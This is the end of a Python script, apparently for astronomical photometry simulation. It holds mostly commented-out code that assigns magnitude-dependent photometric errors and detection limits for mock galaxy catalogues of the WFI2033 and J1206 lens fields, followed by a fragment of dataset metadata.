WFI2033\n#dataout[gerr_o][data[g]<20] = positive(np.random.normal(0.005,0.004, len(data[g][data[g]<20])))\n#dataout[gerr_o][(data[g]>=20) & (data[g]<21)] = positive(np.random.normal(0.01, 0.002, len(data[g][(data[g]>=20) & (data[g]<21)])))\n#dataout[gerr_o][(data[g]>=21) & (data[g]<21.5)] = positive(np.random.normal(0.02, 0.011, len(data[g][(data[g]>=21) & (data[g]<21.5)])))\n#dataout[gerr_o][(data[g]>=21.5) & (data[g]<22)] = positive(np.random.normal(0.03, 0.007, len(data[g][(data[g]>=21.5) & (data[g]<22)])))\n#dataout[gerr_o][(data[g]>=22) & (data[g]<22.5)] = positive(np.random.normal(0.04, 0.010, len(data[g][(data[g]>=22) & (data[g]<22.5)])))\n#dataout[gerr_o][(data[g]>=22.5) & (data[g]<22.75)] = positive(np.random.normal(0.05, 0.007, len(data[g][(data[g]>=22.5) & (data[g]<22.75)])))\n#dataout[gerr_o][(data[g]>=22.75) & (data[g]<23)] = positive(np.random.normal(0.07, 0.013, len(data[g][(data[g]>=22.75) & (data[g]<23)])))\n#dataout[gerr_o][(data[g]>=23) & (data[g]<23.25)] = positive(np.random.normal(0.08, 0.019, len(data[g][(data[g]>=23) & (data[g]<23.25)])))\n#dataout[gerr_o][(data[g]>=23.25) & (data[g]<23.5)] = positive(np.random.normal(0.09, 0.024, len(data[g][(data[g]>=23.25) & (data[g]<23.5)])))\n#dataout[gerr_o][(data[g]>=23.5) & (data[g]<23.75)] = positive(np.random.normal(0.12, 0.032, len(data[g][(data[g]>=23.5) & (data[g]<23.75)])))\n#dataout[gerr_o][(data[g]>=23.75) & (data[g]<24)] = positive(np.random.normal(0.14, 0.026, len(data[g][(data[g]>=23.75) & (data[g]<24)])))\n#dataout[gerr_o][(data[g]>=24) & (data[g]<24.25)] = positive(np.random.normal(0.18, 0.040, len(data[g][(data[g]>=24) & (data[g]<24.25)])))\n#dataout[gerr_o][(data[g]>=24.25) & (data[g]<24.5)] = positive(np.random.normal(0.22, 0.056, len(data[g][(data[g]>=24.25) & (data[g]<24.5)])))\n#dataout[gerr_o][(data[g]>=24.5) & (data[g]<24.75)] = positive(np.random.normal(0.25, 0.053, len(data[g][(data[g]>=24.5) & (data[g]<24.75)])))\n#dataout[gerr_o][data[g]>=24.75] = positive(np.random.normal(0.29, 0.062, len(data[g][data[g]>=24.75])))\n\n# J1206\n#zpterr = 0.025\n#zpterr = 0.00\n#dataout[gerr_o][data[g]<20] = positive(np.random.normal(np.sqrt(0.005**2+zpterr**2),0.005, len(data[g][data[g]<20])))\n#dataout[gerr_o][(data[g]>=20) & (data[g]<21)] = positive(np.random.normal(np.sqrt(0.01**2+zpterr**2), 0.004, len(data[g][(data[g]>=20) & (data[g]<21)])))\n#dataout[gerr_o][(data[g]>=21) & (data[g]<22)] = positive(np.random.normal(np.sqrt(0.01**2+zpterr**2), 0.004, len(data[g][(data[g]>=21) & (data[g]<22)])))\n#dataout[gerr_o][(data[g]>=22) & (data[g]<22.5)] = positive(np.random.normal(np.sqrt(0.01**2+zpterr**2), 0.004, len(data[g][(data[g]>=22) & (data[g]<22.5)])))\n#dataout[gerr_o][(data[g]>=22.5) & (data[g]<22.75)] = positive(np.random.normal(np.sqrt(0.02**2+zpterr**2), 0.008, len(data[g][(data[g]>=22.5) & (data[g]<22.75)])))\n#dataout[gerr_o][(data[g]>=22.75) & (data[g]<23)] = positive(np.random.normal(np.sqrt(0.02**2+zpterr**2), 0.007, len(data[g][(data[g]>=22.75) & (data[g]<23)])))\n#dataout[gerr_o][(data[g]>=23) & (data[g]<23.25)] = positive(np.random.normal(np.sqrt(0.02**2+zpterr**2), 0.006, len(data[g][(data[g]>=23) & (data[g]<23.25)])))\n#dataout[gerr_o][(data[g]>=23.25) & (data[g]<23.5)] = positive(np.random.normal(np.sqrt(0.03**2+zpterr**2), 0.006, len(data[g][(data[g]>=23.25) & (data[g]<23.5)])))\n#dataout[gerr_o][(data[g]>=23.5) & (data[g]<23.75)] = positive(np.random.normal(np.sqrt(0.04**2+zpterr**2), 0.008, len(data[g][(data[g]>=23.5) & (data[g]<23.75)])))\n#dataout[gerr_o][(data[g]>=23.75) & (data[g]<24)] = positive(np.random.normal(np.sqrt(0.03**2+zpterr**2), 0.011, len(data[g][(data[g]>=23.75) & (data[g]<24)])))\n#dataout[gerr_o][(data[g]>=24) & (data[g]<24.25)] = positive(np.random.normal(np.sqrt(0.05**2+zpterr**2), 0.010, len(data[g][(data[g]>=24) & (data[g]<24.25)])))\n#dataout[gerr_o][(data[g]>=24.25) & (data[g]<24.5)] = positive(np.random.normal(np.sqrt(0.06**2+zpterr**2), 0.011, len(data[g][(data[g]>=24.25) & (data[g]<24.5)])))\n#dataout[gerr_o][(data[g]>=24.5) & (data[g]<24.75)] = positive(np.random.normal(np.sqrt(0.06**2+zpterr**2), 0.016, len(data[g][(data[g]>=24.5) & (data[g]<24.75)])))\n#dataout[gerr_o][(data[g]>=24.75) & (data[g]<25)] = positive(np.random.normal(np.sqrt(0.08**2+zpterr**2), 0.014, len(data[g][(data[g]>=24.75) & (data[g]<25)])))\n#dataout[gerr_o][(data[g]>=25) & (data[g]<25.25)] = positive(np.random.normal(np.sqrt(0.09**2+zpterr**2), 0.019, len(data[g][(data[g]>=25) & (data[g]<25.25)])))\n#dataout[gerr_o][(data[g]>=25.25) & (data[g]<25.5)] = positive(np.random.normal(np.sqrt(0.09**2+zpterr**2), 0.022, len(data[g][(data[g]>=25.25) & (data[g]<25.5)])))\n#dataout[gerr_o][(data[g]>=25.5) & (data[g]<26)] = positive(np.random.normal(np.sqrt(0.11**2+zpterr**2), 0.025, len(data[g][(data[g]>=25.5) & (data[g]<26)])))\n#dataout[gerr_o][data[g]>=24.75] = positive(np.random.normal(np.sqrt(0.19**2+zpterr**2), 0.020, len(data[g][data[g]>=24.75])))\n\n# WFI2033\n#dataout[rerr_o][data[r]<20] = positive(np.random.normal(0.005,0.007, len(data[r][data[r]<20])))\n#dataout[rerr_o][(data[r]>=20) & (data[r]<20.5)] = positive(np.random.normal(0.01, 0.008, len(data[r][(data[r]>=20) & (data[r]<20.5)])))\n#dataout[rerr_o][(data[r]>=20.5) & (data[r]<21)] = positive(np.random.normal(0.02, 0.008, len(data[r][(data[r]>=20.5) & (data[r]<21)])))\n#dataout[rerr_o][(data[r]>=21) & (data[r]<21.5)] = positive(np.random.normal(0.03, 0.007, len(data[r][(data[r]>=21) & (data[r]<21.5)])))\n#dataout[rerr_o][(data[r]>=21.5) & (data[r]<22)] = positive(np.random.normal(0.03, 0.009, len(data[r][(data[r]>=21.5) & (data[r]<22)])))\n#dataout[rerr_o][(data[r]>=22) & (data[r]<22.5)] = positive(np.random.normal(0.05, 0.016, len(data[r][(data[r]>=22) & (data[r]<22.5)])))\n#dataout[rerr_o][(data[r]>=22.5) & (data[r]<22.75)] = positive(np.random.normal(0.06, 0.009, len(data[r][(data[r]>=22.5) & (data[r]<22.75)])))\n#dataout[rerr_o][(data[r]>=22.75) & (data[r]<23)] = positive(np.random.normal(0.08, 0.016, len(data[r][(data[r]>=22.75) & (data[r]<23)])))\n#dataout[rerr_o][(data[r]>=23) & (data[r]<23.25)] = positive(np.random.normal(0.08, 0.019, len(data[r][(data[r]>=23) & (data[r]<23.25)])))\n#dataout[rerr_o][(data[r]>=23.25) & (data[r]<23.5)] = positive(np.random.normal(0.10, 0.018, len(data[r][(data[r]>=23.25) & (data[r]<23.5)])))\n#dataout[rerr_o][(data[r]>=23.5) & (data[r]<23.75)] = positive(np.random.normal(0.11, 0.018, len(data[r][(data[r]>=23.5) & (data[r]<23.75)])))\n#dataout[rerr_o][(data[r]>=23.75) & (data[r]<24)] = positive(np.random.normal(0.14, 0.021, len(data[r][(data[r]>=23.75) & (data[r]<24)])))\n#dataout[rerr_o][(data[r]>=24) & (data[r]<24.25)] = positive(np.random.normal(0.15, 0.020, len(data[r][(data[r]>=24) & (data[r]<24.25)])))\n#dataout[rerr_o][data[r]>=24.25] = positive(np.random.normal(0.16, 0.026, len(data[r][data[r]>=24.25])))\n\n# J1206\n#zpterr = 0.025\n#zpterr = 0.00\n#dataout[rerr_o][data[r]<20] = positive(np.random.normal(np.sqrt(0.005**2+zpterr**2),0.005, len(data[r][data[r]<20])))\n#dataout[rerr_o][(data[r]>=20) & (data[r]<21)] = positive(np.random.normal(np.sqrt(0.005**2+zpterr**2),0.005, len(data[r][(data[r]>=20) & (data[r]<21)])))\n#dataout[rerr_o][(data[r]>=21) & (data[r]<21.5)] = positive(np.random.normal(np.sqrt(0.01**2+zpterr**2), 0.003, len(data[r][(data[r]>=21) & (data[r]<21.5)])))\n#dataout[rerr_o][(data[r]>=21.5) & (data[r]<22)] = positive(np.random.normal(np.sqrt(0.01**2+zpterr**2), 0.004, len(data[r][(data[r]>=21.5) & (data[r]<22)])))\n#dataout[rerr_o][(data[r]>=22) & (data[r]<22.5)] = positive(np.random.normal(np.sqrt(0.01**2+zpterr**2), 0.008, len(data[r][(data[r]>=22) & (data[r]<22.5)])))\n#dataout[rerr_o][(data[r]>=22.5) & (data[r]<22.75)] = positive(np.random.normal(np.sqrt(0.02**2+zpterr**2), 0.005, len(data[r][(data[r]>=22.5) & (data[r]<22.75)])))\n#dataout[rerr_o][(data[r]>=22.75) & (data[r]<23)] = positive(np.random.normal(np.sqrt(0.02**2+zpterr**2), 0.006, len(data[r][(data[r]>=22.75) & (data[r]<23)])))\n#dataout[rerr_o][(data[r]>=23) & (data[r]<23.25)] = positive(np.random.normal(np.sqrt(0.02**2+zpterr**2), 0.007, len(data[r][(data[r]>=23) & (data[r]<23.25)])))\n#dataout[rerr_o][(data[r]>=23.25) & (data[r]<23.5)] = positive(np.random.normal(np.sqrt(0.03**2+zpterr**2), 0.008, len(data[r][(data[r]>=23.25) & (data[r]<23.5)])))\n#dataout[rerr_o][(data[r]>=23.5) & (data[r]<23.75)] = positive(np.random.normal(np.sqrt(0.03**2+zpterr**2), 0.010, len(data[r][(data[r]>=23.5) & (data[r]<23.75)])))\n#dataout[rerr_o][(data[r]>=23.75) & (data[r]<24)] = positive(np.random.normal(np.sqrt(0.04**2+zpterr**2), 0.013, len(data[r][(data[r]>=23.75) & (data[r]<24)])))\n#dataout[rerr_o][(data[r]>=24) & (data[r]<24.25)] = positive(np.random.normal(np.sqrt(0.04**2+zpterr**2), 0.011, len(data[r][(data[r]>=24) & (data[r]<24.25)])))\n#dataout[rerr_o][(data[r]>=24.25) & (data[r]<24.5)] = positive(np.random.normal(np.sqrt(0.05**2+zpterr**2), 0.017, len(data[r][(data[r]>=24.25) & (data[r]<24.5)])))\n#dataout[rerr_o][(data[r]>=24.5) & (data[r]<24.75)] = positive(np.random.normal(np.sqrt(0.06**2+zpterr**2), 0.020, len(data[r][(data[r]>=24.5) & (data[r]<24.75)])))\n#dataout[rerr_o][(data[r]>=24.75) & (data[r]<25)] = positive(np.random.normal(np.sqrt(0.08**2+zpterr**2), 0.024, len(data[r][(data[r]>=24.75) & (data[r]<25)])))\n#dataout[rerr_o][data[r]>=25] = positive(np.random.normal(np.sqrt(0.10**2+zpterr**2), 0.027, len(data[r][data[r]>=25])))\n\n# WFI2033\n#dataout[ierr_o][data[i]<19] = positive(np.random.normal(0.005,0.002, len(data[i][data[i]<19])))\n#dataout[ierr_o][(data[i]>=19) & (data[i]<20)] = positive(np.random.normal(0.01, 0.005, len(data[i][(data[i]>=19) & (data[i]<20)])))\n#dataout[ierr_o][(data[i]>=20) & (data[i]<20.5)] = positive(np.random.normal(0.02, 0.005, len(data[i][(data[i]>=20) & (data[i]<20.5)])))\n#dataout[ierr_o][(data[i]>=20.5) & (data[i]<21)] = positive(np.random.normal(0.03, 0.011, len(data[i][(data[i]>=20.5) & (data[i]<21)])))\n#dataout[ierr_o][(data[i]>=21) & (data[i]<21.5)] = positive(np.random.normal(0.04, 0.015, len(data[i][(data[i]>=21) & (data[i]<21.5)])))\n#dataout[ierr_o][(data[i]>=21.5) & (data[i]<22)] = positive(np.random.normal(0.07, 0.019, len(data[i][(data[i]>=21.5) & (data[i]<22)])))\n#dataout[ierr_o][(data[i]>=22) & (data[i]<22.5)] = positive(np.random.normal(0.10, 0.023, len(data[i][(data[i]>=22) & (data[i]<22.5)])))\n#dataout[ierr_o][(data[i]>=22.5) & (data[i]<22.75)] = positive(np.random.normal(0.13, 0.034, len(data[i][(data[i]>=22.5) & (data[i]<22.75)])))\n#dataout[ierr_o][(data[i]>=22.75) & (data[i]<23)] = positive(np.random.normal(0.15, 0.038, len(data[i][(data[i]>=22.75) & (data[i]<23)])))\n#dataout[ierr_o][(data[i]>=23) & (data[i]<23.25)] = positive(np.random.normal(0.19, 0.039, len(data[i][(data[i]>=23) & (data[i]<23.25)])))\n#dataout[ierr_o][data[i]>=23.25] = positive(np.random.normal(0.23, 0.031, len(data[i][data[i]>=23.25])))\n\n# J1206\n#zpterr = 0.025\n#zpterr = 0.00\n#dataout[ierr_o][data[i]<20] = positive(np.random.normal(np.sqrt(0.005**2+zpterr**2),0.005, len(data[i][data[i]<20])))\n#dataout[ierr_o][(data[i]>=20) & (data[i]<21)] = positive(np.random.normal(np.sqrt(0.005**2+zpterr**2),0.005, len(data[i][(data[i]>=20) & (data[i]<21)])))\n#dataout[ierr_o][(data[i]>=21) & (data[i]<22)] = positive(np.random.normal(np.sqrt(0.01**2+zpterr**2), 0.003, len(data[i][(data[i]>=21) & (data[i]<22)])))\n#dataout[ierr_o][(data[i]>=22) & (data[i]<22.5)] = positive(np.random.normal(np.sqrt(0.02**2+zpterr**2), 0.006, len(data[i][(data[i]>=22) & (data[i]<22.5)])))\n#dataout[ierr_o][(data[i]>=22.5) & (data[i]<22.75)] = positive(np.random.normal(np.sqrt(0.02**2+zpterr**2), 0.007, len(data[i][(data[i]>=22.5) & (data[i]<22.75)])))\n#dataout[ierr_o][(data[i]>=22.75) & (data[i]<23)] = positive(np.random.normal(np.sqrt(0.02**2+zpterr**2), 0.008, len(data[i][(data[i]>=22.75) & (data[i]<23)])))\n#dataout[ierr_o][(data[i]>=23) & (data[i]<23.25)] = positive(np.random.normal(np.sqrt(0.02**2+zpterr**2), 0.005, len(data[i][(data[i]>=23) & (data[i]<23.25)])))\n#dataout[ierr_o][(data[i]>=23.25) & (data[i]<23.5)] = positive(np.random.normal(np.sqrt(0.03**2+zpterr**2), 0.007, len(data[i][(data[i]>=23.25) & (data[i]<23.5)])))\n#dataout[ierr_o][(data[i]>=23.5) & (data[i]<23.75)] = positive(np.random.normal(np.sqrt(0.03**2+zpterr**2), 0.014, len(data[i][(data[i]>=23.5) & (data[i]<23.75)])))\n#dataout[ierr_o][data[i]>=23.25] = positive(np.random.normal(np.sqrt(0.04**2+zpterr**2), 0.015, len(data[i][data[i]>=23.25])))\n\n# WFI2033\n#dataout[zerr_o][data[z]<18] = positive(np.random.normal(0.005,0.005, len(data[z][data[z]<18])))\n#dataout[zerr_o][(data[z]>=18) & (data[z]<19)] = positive(np.random.normal(0.01, 0.009, len(data[z][(data[z]>=18) & (data[z]<19)])))\n#dataout[zerr_o][(data[z]>=19) & (data[z]<20)] = positive(np.random.normal(0.02, 0.008, len(data[z][(data[z]>=19) & (data[z]<20)])))\n#dataout[zerr_o][(data[z]>=20) & (data[z]<20.5)] = positive(np.random.normal(0.04, 0.015, len(data[z][(data[z]>=20) & (data[z]<20.5)])))\n#dataout[zerr_o][(data[z]>=20.5) & (data[z]<21)] = positive(np.random.normal(0.06, 0.014, len(data[z][(data[z]>=20.5) & (data[z]<21)])))\n#dataout[zerr_o][(data[z]>=21) & (data[z]<21.5)] = positive(np.random.normal(0.07, 0.017, len(data[z][(data[z]>=21) & (data[z]<21.5)])))\n#dataout[zerr_o][(data[z]>=21.5) & (data[z]<22)] = positive(np.random.normal(0.10, 0.027, len(data[z][(data[z]>=21.5) & (data[z]<22)])))\n#dataout[zerr_o][(data[z]>=22) & (data[z]<22.5)] = positive(np.random.normal(0.14, 0.027, len(data[z][(data[z]>=22) & (data[z]<22.5)])))\n#dataout[zerr_o][(data[z]>=22.5) & (data[z]<22.75)] = positive(np.random.normal(0.17, 0.035, len(data[z][(data[z]>=22.5) & (data[z]<22.75)])))\n#dataout[zerr_o][(data[z]>=22.75) & (data[z]<23)] = positive(np.random.normal(0.18, 0.034, len(data[z][(data[z]>=22.75) & (data[z]<23)])))\n#dataout[zerr_o][(data[z]>=23) & (data[z]<23.25)] = positive(np.random.normal(0.21, 0.037, len(data[z][(data[z]>=23) & (data[z]<23.25)])))\n#dataout[zerr_o][data[z]>=23.25] = positive(np.random.normal(0.30, 0.082, len(data[z][data[z]>=23.25])))\n\n# WFI2033\n#dataout[Jerr_o][data[J]<16] = positive(np.random.normal(np.sqrt(0.005**2+0.04**2),0.004, len(data[J][data[J]<16])))\n#dataout[Jerr_o][(data[J]>=16) & (data[J]<17)] = positive(np.random.normal(np.sqrt(0.01**2+0.04**2), 0.006, len(data[J][(data[J]>=16) & (data[J]<17)])))\n#dataout[Jerr_o][(data[J]>=17) & (data[J]<18)] = positive(np.random.normal(np.sqrt(0.02**2+0.04**2), 0.014, len(data[J][(data[J]>=17) & (data[J]<18)])))\n#dataout[Jerr_o][(data[J]>=18) & (data[J]<18.5)] = positive(np.random.normal(np.sqrt(0.03**2+0.04**2), 0.009, len(data[J][(data[J]>=18) & (data[J]<18.5)])))\n#dataout[Jerr_o][(data[J]>=18.5) & (data[J]<19)] = positive(np.random.normal(np.sqrt(0.04**2+0.04**2), 0.010, len(data[J][(data[J]>=18.5) & (data[J]<19)])))\n#dataout[Jerr_o][(data[J]>=19) & (data[J]<19.5)] = positive(np.random.normal(np.sqrt(0.06**2+0.04**2), 0.020, len(data[J][(data[J]>=19) & (data[J]<19.5)])))\n#dataout[Jerr_o][(data[J]>=19.5) & (data[J]<20)] = positive(np.random.normal(np.sqrt(0.07**2+0.04**2), 0.022, len(data[J][(data[J]>=19.5) & (data[J]<20)])))\n#dataout[Jerr_o][(data[J]>=20) & (data[J]<20.5)] = positive(np.random.normal(np.sqrt(0.10**2+0.04**2), 0.031, len(data[J][(data[J]>=20) & (data[J]<20.5)])))\n#dataout[Jerr_o][(data[J]>=20.5) & (data[J]<20.75)] = positive(np.random.normal(np.sqrt(0.11**2+0.04**2), 0.037, len(data[J][(data[J]>=20.5) & (data[J]<20.75)])))\n#dataout[Jerr_o][(data[J]>=20.75) & (data[J]<21)] = positive(np.random.normal(np.sqrt(0.15**2+0.04**2), 0.028, len(data[J][(data[J]>=20.75) & (data[J]<21)])))\n#dataout[Jerr_o][(data[J]>=21) & (data[J]<21.25)] = positive(np.random.normal(np.sqrt(0.16**2+0.04**2), 0.035, len(data[J][(data[J]>=21) & (data[J]<21.25)])))\n#dataout[Jerr_o][(data[J]>=21.25) & (data[J]<21.5)] = positive(np.random.normal(np.sqrt(0.18**2+0.04**2), 0.028, len(data[J][(data[J]>=21.25) & (data[J]<21.5)])))\n#dataout[Jerr_o][data[J]>=21.5] = positive(np.random.normal(np.sqrt(0.19**2+0.04**2), 0.029, len(data[J][data[J]>=21.5])))\n\n# WFI2033\n#dataout[Herr_o][data[H]<15] = positive(np.random.normal(np.sqrt(0.005**2+0.04**2),0.003, len(data[H][data[H]<15])))\n#dataout[Herr_o][(data[H]>=15) & (data[H]<16)] = positive(np.random.normal(np.sqrt(0.01**2+0.04**2), 0.003, len(data[H][(data[H]>=15) & (data[H]<16)])))\n#dataout[Herr_o][(data[H]>=16) & (data[H]<17)] = positive(np.random.normal(np.sqrt(0.02**2+0.04**2), 0.013, len(data[H][(data[H]>=16) & (data[H]<17)])))\n#dataout[Herr_o][(data[H]>=17) & (data[H]<17.5)] = positive(np.random.normal(np.sqrt(0.03**2+0.04**2), 0.014, len(data[H][(data[H]>=17) & (data[H]<17.5)])))\n#dataout[Herr_o][(data[H]>=17.5) & (data[H]<18)] = positive(np.random.normal(np.sqrt(0.04**2+0.04**2), 0.008, len(data[H][(data[H]>=17.5) & (data[H]<18)])))\n#dataout[Herr_o][(data[H]>=18) & (data[H]<18.5)] = positive(np.random.normal(np.sqrt(0.06**2+0.04**2), 0.015, len(data[H][(data[H]>=18) & (data[H]<18.5)])))\n#dataout[Herr_o][(data[H]>=18.5) & (data[H]<19)] = positive(np.random.normal(np.sqrt(0.07**2+0.04**2), 0.025, len(data[H][(data[H]>=18.5) & (data[H]<19)])))\n#dataout[Herr_o][(data[H]>=19) & (data[H]<19.5)] = positive(np.random.normal(np.sqrt(0.09**2+0.04**2), 0.021, len(data[H][(data[H]>=19) & (data[H]<19.5)])))\n#dataout[Herr_o][(data[H]>=19.5) & (data[H]<19.75)] = positive(np.random.normal(np.sqrt(0.13**2+0.04**2), 0.048, len(data[H][(data[H]>=19.5) & (data[H]<19.75)])))\n#dataout[Herr_o][(data[H]>=19.75) & (data[H]<20)] = positive(np.random.normal(np.sqrt(0.12**2+0.04**2), 0.034, len(data[H][(data[H]>=19.75) & (data[H]<20)])))\n#dataout[Herr_o][(data[H]>=20) & (data[H]<20.25)] = positive(np.random.normal(np.sqrt(0.17**2+0.04**2), 0.038, len(data[H][(data[H]>=20) & (data[H]<20.25)])))\n#dataout[Herr_o][(data[H]>=20.25) & (data[H]<20.5)] = positive(np.random.normal(np.sqrt(0.17**2+0.04**2), 0.025, len(data[H][(data[H]>=20.25) & (data[H]<20.5)])))\n#dataout[Herr_o][data[H]>=20.5] = positive(np.random.normal(np.sqrt(0.19**2+0.04**2), 0.029, len(data[H][data[H]>=20.5])))\n\n# WFI2033\n#dataout[Kerr_o][data[K]<15] = positive(np.random.normal(np.sqrt(0.005**2+0.08**2),0.004, len(data[K][data[K]<15])))\n#dataout[Kerr_o][(data[K]>=15) & (data[K]<16)] = positive(np.random.normal(np.sqrt(0.02**2+0.08**2), 0.013, len(data[K][(data[K]>=15) & (data[K]<16)])))\n#dataout[Kerr_o][(data[K]>=16) & (data[K]<17)] = positive(np.random.normal(np.sqrt(0.03**2+0.08**2), 0.007, len(data[K][(data[K]>=16) & (data[K]<17)])))\n#dataout[Kerr_o][(data[K]>=17) & (data[K]<17.5)] = positive(np.random.normal(np.sqrt(0.04**2+0.08**2), 0.016, len(data[K][(data[K]>=17) & (data[K]<17.5)])))\n#dataout[Kerr_o][(data[K]>=17.5) & (data[K]<18)] = positive(np.random.normal(np.sqrt(0.06**2+0.08**2), 0.018, len(data[K][(data[K]>=17.5) & (data[K]<18)])))\n#dataout[Kerr_o][(data[K]>=18) & (data[K]<18.5)] = positive(np.random.normal(np.sqrt(0.07**2+0.08**2), 0.014, len(data[K][(data[K]>=18) & (data[K]<18.5)])))\n#dataout[Kerr_o][(data[K]>=18.5) & (data[K]<19)] = positive(np.random.normal(np.sqrt(0.10**2+0.08**2), 0.026, len(data[K][(data[K]>=18.5) & (data[K]<19)])))\n#dataout[Kerr_o][(data[K]>=19) & (data[K]<19.5)] = positive(np.random.normal(np.sqrt(0.14**2+0.08**2), 0.032, len(data[K][(data[K]>=19) & (data[K]<19.5)])))\n#dataout[Kerr_o][(data[K]>=19.5) & (data[K]<19.75)] = positive(np.random.normal(np.sqrt(0.17**2+0.08**2), 0.035, len(data[K][(data[K]>=19.5) & (data[K]<19.75)])))\n#dataout[Kerr_o][(data[K]>=19.75) & (data[K]<20)] = positive(np.random.normal(np.sqrt(0.19**2+0.08**2), 0.070, len(data[K][(data[K]>=19.75) & (data[K]<20)])))\n#dataout[Kerr_o][data[K]>=20] = positive(np.random.normal(np.sqrt(0.19**2+0.08**2), 0.037, len(data[K][data[K]>=20])))\n\n# J1206\n#zpterr = 0.04\n#zpterr = 0.00\n#dataout[Kerr_o][data[K]<18.5] = positive(np.random.normal(np.sqrt(0.01**2+zpterr**2),0.005, len(data[K][data[K]<18.5])))\n#dataout[Kerr_o][(data[K]>=18.5) & (data[K]<19.5)] = positive(np.random.normal(np.sqrt(0.01**2+zpterr**2), 0.007, len(data[K][(data[K]>=18.5) & (data[K]<19.5)])))\n#dataout[Kerr_o][(data[K]>=19.5) & (data[K]<20.5)] = positive(np.random.normal(np.sqrt(0.02**2+zpterr**2), 0.006, len(data[K][(data[K]>=19.5) & (data[K]<20.5)])))\n#dataout[Kerr_o][(data[K]>=20.5) & (data[K]<21.5)] = positive(np.random.normal(np.sqrt(0.03**2+zpterr**2), 0.009, len(data[K][(data[K]>=20.5) & (data[K]<21.5)])))\n#dataout[Kerr_o][(data[K]>=21.5) & (data[K]<22)] = positive(np.random.normal(np.sqrt(0.05**2+zpterr**2), 0.011, len(data[K][(data[K]>=21.5) & (data[K]<22)])))\n#dataout[Kerr_o][(data[K]>=22) & (data[K]<22.5)] = positive(np.random.normal(np.sqrt(0.07**2+zpterr**2), 0.016, len(data[K][(data[K]>=22) & (data[K]<22.5)])))\n#dataout[Kerr_o][(data[K]>=22.5) & (data[K]<22.75)] = positive(np.random.normal(np.sqrt(0.09**2+zpterr**2), 0.029, len(data[K][(data[K]>=22.5) & (data[K]<22.75)])))\n#dataout[Kerr_o][(data[K]>=22.75) & (data[K]<23)] = positive(np.random.normal(np.sqrt(0.10**2+zpterr**2), 0.015, len(data[K][(data[K]>=22.75) & (data[K]<23)])))\n#dataout[Kerr_o][(data[K]>=23) & (data[K]<23.25)] = positive(np.random.normal(np.sqrt(0.12**2+zpterr**2), 0.022, len(data[K][(data[K]>=23) & (data[K]<23.25)])))\n#dataout[Kerr_o][data[K]>=23.25] = positive(np.random.normal(np.sqrt(0.13**2+zpterr**2), 0.025, len(data[K][data[K]>=23.25])))\n\n#dataout = np.delete(dataout,np.where(dataout[i_o] > 24),axis=1)\n\n#dataout[u_o] = np.random.normal(dataout[u_o], dataout[uerr_o])\n#dataout[g_o] = np.random.normal(dataout[g_o], dataout[gerr_o])\n#dataout[r_o] = np.random.normal(dataout[r_o], dataout[rerr_o])\n#dataout[i_o] = np.random.normal(dataout[i_o], dataout[ierr_o])\n#dataout[z_o] = np.random.normal(dataout[z_o], dataout[zerr_o])\n#dataout[J_o] = np.random.normal(dataout[J_o], dataout[Jerr_o])\n#dataout[H_o] = np.random.normal(dataout[H_o], dataout[Herr_o])\n#dataout[K_o] = np.random.normal(dataout[K_o], dataout[Kerr_o])\n\n# eliminate objects that are i> 24 in both the original iorig and the randomized i\n#dataout = np.delete(dataout,np.where((dataout[i_o] > 24) & (dataout[iorig_o] > 24)),axis=1)\n\n# applying 1-sigma detection limits including their uncertainty; these are final values I used as input for lephare for the real lens field; all values are in AB\n#dataout[u_o][dataout[u_o]>=np.random.normal(27.39, 0.05, len(dataout[u_o]))] = 99.0 # WFI2033\n#dataout[g_o][dataout[g_o]>=np.random.normal(25.48, 0.15, len(dataout[g_o]))] = 99.0 # WFI2033\n#dataout[r_o][dataout[r_o]>=np.random.normal(25.55, 0.12, len(dataout[r_o]))] = 99.0 # WFI2033\n#dataout[g_o][dataout[g_o]>=np.random.normal(25.09+1.75, 0.07, len(dataout[g_o]))] = 99.0 # J1206\n#dataout[r_o][dataout[r_o]>=np.random.normal(24.88+1.75, 0.04, len(dataout[r_o]))] = 99.0 # J1206\n#dataout[z_o][dataout[z_o]>=np.random.normal(24.64, 0.45, len(dataout[z_o]))] = 99.0 # WFI2033\n#dataout[J_o][dataout[J_o]>=np.random.normal(23.21, 0.12, len(dataout[J_o]))] = 99.0 # WFI2033\n#dataout[H_o][dataout[H_o]>=np.random.normal(22.60, 0.08, len(dataout[H_o]))] = 99.0 # WFI2033\n#dataout[K_o][dataout[K_o]>=np.random.normal(22.50, 0.04, len(dataout[K_o]))] = 99.0 # WFI2033\n#dataout[K_o][dataout[K_o]>=np.random.normal(20.63+1.75+1.85, 0.07, len(dataout[K_o]))] = 99.0 # added conversion to AB; # J1206\n#dataout[uerr_o][dataout[u_o]==99.0] = 27.39 # WFI2033\n#dataout[gerr_o][dataout[g_o]==99.0] = 25.09+1.75 # J1206\n#dataout[rerr_o][dataout[r_o]==99.0] = 24.88+1.75 # J1206\n#dataout[zerr_o][dataout[z_o]==99.0] = 24.64 # WFI2033\n#dataout[Jerr_o][dataout[J_o]==99.0] = 23.21 # WFI2033\n#dataout[Herr_o][dataout[H_o]==99.0] = 22.60 # WFI2033\n#dataout[Kerr_o][dataout[K_o]==99.0] = 20.63+1.75+1.85 # J1206\n\n#head = \"GalID \\t z_spec \\t pos_0[rad] \\t pos_1[rad] \\t M_Halo[M_sol/h] \\t M_Stellar[M_sol/h] \\t mag_SDSS_iorig \\t mag_SDSS_u \\t mag_SDSS_uerr \\t mag_SDSS_g \\t mag_SDSS_gerr \\t mag_SDSS_r \\t mag_SDSS_rerr \\t mag_SDSS_i \\t mag_SDSS_ierr \\t mag_SDSS_z \\t mag_SDSS_zerr \\t mag_J \\t mag_Jerr \\t mag_H \\t mag_Herr \\t mag_K \\t mag_Kerr\" NOT USING THIS ONE BECAUSE THE SPECIAL CHARACTERS ARE NOT RECOGNIZED PROPERLY BY BPZ\n#head = \"GalID \\t z_spec \\t pos0 \\t pos_1 \\t M_Halo \\t M_Stellar \\t mag_SDSS_iorig \\t mag_SDSS_g \\t mag_SDSS_gerr \\t mag_SDSS_r \\t mag_SDSS_rerr \\t mag_SDSS_i \\t mag_SDSS_ierr \\t mag_K \\t mag_Kerr\"\n#np.savetxt(fileout_ugrizJHK,dataout.T,header=head,fmt='%d \\t %.3f \\t %.7f \\t %.7f \\t %.3e \\t %.3e \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f')\n\nprint filein + ' Done!'\n" }, { "alpha_fraction": 0.5225880742073059, "alphanum_fraction": 0.6619448661804199, "avg_line_length": 60.203125, "blob_id": "eab850c58f00c56171ef5c7a78a30a2d7a0679cc", "content_id": 